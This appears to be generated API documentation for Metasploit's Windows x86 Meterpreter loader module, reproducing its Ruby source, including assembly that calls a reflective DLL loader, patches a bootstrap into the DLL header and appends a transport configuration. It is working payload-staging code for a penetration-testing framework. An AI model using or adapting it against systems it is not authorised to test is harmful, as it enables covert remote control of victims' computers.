Module: Msf::Payload::Windows::MeterpreterLoader

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/meterpreter_loader.rb

Overview

Common module stub for ARCH_X86 payloads that make use of Meterpreter.

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_metsrv(opts = {}) ⇒ Object


36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 36

def asm_invoke_metsrv(opts={})
  asm = %Q^
      ; prologue
        dec ebp               ; 'M'
        pop edx               ; 'Z'
        call $+5              ; call next instruction
        pop ebx               ; get the current location (+7 bytes)
        push edx              ; restore edx
        inc ebp               ; restore ebp
        push ebp              ; save ebp for later
        mov ebp, esp          ; set up a new stack frame
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader() (0x????????)
        add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
        call ebx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
        ; offset from ReflectiveLoader() to the end of the DLL
        add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
  ^

  unless opts[:stageless] || opts[:force_write_handle] == true
    asm << %Q^
        mov [ebx], edi        ; write the current socket/handle to the config
    ^
  end

  asm << %Q^
        push ebx              ; push the pointer to the configuration start
        push 4                ; indicate that we have attached
        push eax              ; push some arbitrary value for hInstance
        call eax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
  ^
end

#generate_config(opts = {}) ⇒ Object


74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 74

def generate_config(opts={})
  ds = opts[:datastore] || datastore
  opts[:uuid] ||= generate_payload_uuid

  # create the configuration block, which for staged connections is really simple.
  config_opts = {
    arch:              opts[:uuid].arch,
    null_session_guid: opts[:null_session_guid] == true,
    exitfunk:          ds[:exit_func] || ds['EXITFUNC'],
    expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
    uuid:              opts[:uuid],
    transports:        opts[:transport_config] || [transport_config(opts)],
    extensions:        [],
    stageless:         opts[:stageless] == true
  }

  # create the configuration instance based off the parameters
  config = Rex::Payloads::Meterpreter::Config.new(config_opts)

  # return the binary version of it
  config.to_b
end

#initialize(info = {}) ⇒ Object


20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 20

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Meterpreter & Configuration RDI',
    'Description'   => 'Inject Meterpreter & the configuration stub via RDI',
    'Author'        => [ 'sf', 'OJ Reeves' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X86,
    'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', },
    'Stage'         => { 'Payload'   => "" }
    ))
end

#stage_meterpreter(opts = {}) ⇒ Object


97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 97

def stage_meterpreter(opts={})
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))

  asm_opts = {
    rdi_offset: offset,
    length:     dll.length,
    stageless:  opts[:stageless] == true
  }

  asm = asm_invoke_metsrv(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string

  # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
  if bootstrap.length > 62
    raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end

#stage_payload(opts = {}) ⇒ Object


70
71
72
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 70

def stage_payload(opts={})
  stage_meterpreter(opts) + generate_config(opts)
end